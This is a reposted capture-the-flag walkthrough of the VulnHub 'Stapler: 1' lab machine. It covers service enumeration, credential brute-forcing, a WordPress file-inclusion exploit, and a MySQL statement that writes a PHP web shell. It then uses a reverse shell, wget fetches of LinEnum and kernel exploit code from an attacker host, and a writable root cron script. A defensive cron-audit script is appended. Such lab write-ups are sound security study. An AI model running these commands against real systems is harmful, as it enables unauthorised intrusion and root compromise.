VulnHub: STAPLER: 1-泓源视野

Initial foothold

1. Network discovery

My target is 10.0.2.31.

2. Port scan

nmap -Pn -p1000- 10.0.2.31

3. OS and service scan

The following services were found:

  • port 21 vsftpd w/ anonymous login
  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  • port 53 dnsmasq 2.75
  • port 80 PHP cli server 5.5 or later
  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
  • port 666 doom
  • port 3306 MySQL 5.7.12–0ubuntu1
  • port 12380 Apache httpd 2.4.18 ((Ubuntu))

4. Vuln scan

Initial enumeration/searching existing exploits of each service

  • port 21 vsftpd 3.0.3 w/ anonymous login

There aren’t any public exploits that I can use.

Login w/ anonymous

username: anonymous

List files

Download it

Read it

Elly has an FTP account.

  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

There’s a banner.

  • port 53 dnsmasq 2.75

Reverse lookup

Nothing

  • port 80 PHP cli server 5.5 or later

Nikto

There are ‘.bashrc’ and ‘.profile’ files.

Download ‘.bashrc’ and ‘.profile’ and read them

wget http://10.0.2.31/.profile

Nothing

Further directory enumeration

Nothing

  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)

I googled for existing exploits and there’s SambaCry, but I need a credential. I’ll leave this for a while.

opsxcq/exploit-CVE-2017-7494 (github.com)
Samba is a free software re-implementation of the SMB/CIFS networking protocol. Samba provides file and print services…

Enumeration

I can access the \kathy and \tmp shares.

Reading the file, I got usernames.

Save them as users.txt

Connect to the accessible share, /kathy

dir
get to_do-list.txt
get vsftpd.conf
get wordpress-4.tar.gz

Read file

Unzip WordPress and read its configuration file

cd wordpress
find . -name '*.php' | grep config
cat ./wp-config-sample.php

Nothing

  • port 666 doom

There’s a file.

Connect and retrieve the file

ls -la

Read the file’s metadata

It’s a zip file.

Unzip it

Open it.

Connect to the other accessible share, /tmp

It’s a program called ‘ls’, not very useful.

  • port 3306 MySQL 5.7.12–0ubuntu1

I cannot access this right now.

  • port 12380 Apache httpd 2.4.18 ((Ubuntu))

Nikto

It’s an HTTPS site.

Nikto again

Directory enumeration

Access the site

Access /admin112233/

Access /blogblog/

Read through every post.

Scan WordPress

There’s a list of users.

Save as ‘users_wp.txt’

Scan for plugin

I googled and came across this exploit code of ‘advanced-video-embed-videos-or-playlists’.

gtech/39646 (github.com)
WordPress Plugin Advanced Video 1.0 - Local File Inclusion Update

Read the script and edit it to match the target.

Exploitation

  1. FTP Port 21 — brute-forcing
  2. SSH Port 22 — brute-forcing
  3. HTTP(S) Port 12380 — brute-forcing and public exploit

Start w/ FTP Port 21 — brute-forcing

I will use users.txt as both the username and password list because some people use the same string as username and password.

I got the credential.

username: SHayslett
password: SHayslett
ls -la

Not much use right now

Next is SSH Port 22 — brute-forcing

Connect

Now, I got the shell.

Last one, HTTP(S) Port 12380 — brute-forcing and public exploit

Start w/ brute-forcing and leave it running for a while.

Using public exploit

Now I got a MySQL credential.

4. MySQL port 3306

Remote login w/ root : plbkac

I’ll create an outfile containing a PHP shell command.

Normally, I’d store the shell file within the WordPress site, so the path is probably the uploads directory used in the query below.

I’ll use a MySQL command to create the PHP shell.

Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";

Verify if the file exists.

Intercept the request w/ Burp Suite and send it to the repeater

Add ‘?cmd=id’ to test the shell function.

Prepare listener on port 443

I’ll supply a reverse shell command to the generated shell using this cheatsheet:

Reverse Shell Cheat Sheet (pentestmonkey.net)
If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards…

URL-encode it w/ Burp Suite’s Decoder.

Supply encoded reverse shell command w/ repeater.

After many tries, I succeeded w/ this command.

Back to the listener, now I got the shell.

Privilege Escalation

I’ll continue w/ the WordPress shell.

Get a TTY shell

1. Explore the directories as listed:
/tmp
/var/log
/var/www/https/
/var/mail

I came across /var/mail/www-data. There’s a PHPMailer message, but I don't know how to exploit it. Let’s skip this for a moment.

2. LinEnum.sh

Prepare the attacker machine as a file server

Download it, store it in /tmp, change its permissions, and run it

wget http://10.0.2.32/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh

This is the information I found interesting.

Kernel version 4.4.0

A user that can run sudo: peter

A cron job located in ‘/etc/cron.d’

A running service, ‘cron -f’, indicating that cron jobs are being executed.

There’s a password in ‘.bash_history’

3. Exploit

  • Login as peter and verify sudo

From LinEnum.sh result

Password: JZQuyIN5

Verify sudo

Change to root

whoami

Now, I’m root.

  • cronjob

From LinEnum.sh result

I will verify the path of these services

There’s a ‘.sh’ script.

Verify permissions

It’s owned by root and can be edited by anyone.

Read its content

Append the command to get a root shell and verify

cat /usr/local/sbin/cron-logrotate.sh

Wait a while and check /tmp

Now, I got rootbash

Run it
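As an added example (not part of the original write-up), this is the check a defender would run to catch the misconfiguration used above: it parses /etc/cron.d-style entries and flags any job whose script is not owned by root or the job's own user, or is writable by group/other, as cron-logrotate.sh was. It assumes the standard six-field cron.d syntax (schedule, user, command); the sample entry is constructed.

```python
"""Audit cron.d entries for scripts that someone other than root could edit.
Added example, not from the original write-up: a script that cron runs as
root must be owned by root and writable only by its owner."""
import os
import pwd
import re
import shlex
import stat

# cron.d / system crontab syntax: minute hour dom month dow user command
JOB_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def parse_cron_d(text):
    """Yield (user, command) per job line; skip comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = JOB_RE.match(line)
        if m:
            yield m.group("user"), m.group("cmd")

def script_path(cmd):
    """First absolute path on the command line: the script cron will execute."""
    return next((t for t in shlex.split(cmd) if t.startswith("/")), None)

def check_script(path, job_user):
    """Reason string if the file can be altered by someone else, else None."""
    try:
        st = os.stat(path)
        job_uid = pwd.getpwnam(job_user).pw_uid
    except (OSError, KeyError) as exc:
        return "cannot resolve: %s" % exc
    if st.st_uid not in (0, job_uid):  # a third user owns the script outright
        return "owned by uid %d, not root or %s" % (st.st_uid, job_user)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):  # the box's bug: mode 777
        return "writable by group/other (mode %o)" % stat.S_IMODE(st.st_mode)
    return None

def audit(cron_text):
    """Return [(user, path, reason)] for every risky job in cron_text."""
    findings = []
    for user, cmd in parse_cron_d(cron_text):
        path = script_path(cmd)
        reason = check_script(path, user) if path else None
        if reason:
            findings.append((user, path, reason))
    return findings

if __name__ == "__main__":  # constructed sample mirroring the box's cron entry
    print(audit("* * * * * root /usr/local/sbin/cron-logrotate.sh\n"))
```

On a real host, feed it the contents of each file under /etc/cron.d; a missing script is reported too, since a writable parent directory lets anyone create it.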

  • kernel exploitation

Verify the kernel version

This machine runs Linux kernel 4.4.0, 32-bit.

Search w/ searchsploit

After many tries, I succeeded w/ this exploit.

Copy and read it

cat 39772.txt

I followed the provided link.

808 - project-zero - Project Zero - Monorail (bugs.chromium.org)

I got the exploit file.

Decompress it

Download to target machine.

wget http://10.0.2.32/suidhelper.c
wget http://10.0.2.32/doubleput.c
wget http://10.0.2.32/compile.sh
./compile.sh

Now, I’m root.

This article was published by 泓源视野 author: admin; its copyright belongs to 泓源视野. The content reflects the author's personal views and does not represent endorsement or support by 泓源视野. If reposting, please cite the source.